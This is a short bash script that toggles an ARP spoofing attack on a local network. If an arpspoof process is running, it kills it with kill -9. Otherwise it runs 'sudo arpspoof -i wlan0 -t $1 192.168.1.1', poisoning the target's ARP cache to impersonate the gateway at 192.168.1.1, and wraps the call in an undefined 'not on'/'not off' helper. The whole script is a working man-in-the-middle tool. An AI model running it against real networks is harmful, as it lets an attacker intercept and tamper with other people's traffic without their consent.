#!/bin/bash
i=$(ps -ax |
while read -r o; do
	echo $o | grep arpspoof | grep "0:00 arpspoof\|0:00 sudo arpspoof" | grep -v grep | awk '{print $1}'
done)
if ! [ -z "$i" ]; then
	sudo kill -9 $i
else
	not on
	sudo arpspoof -i wlan0 -t $1 192.168.1.1
	not off
fi
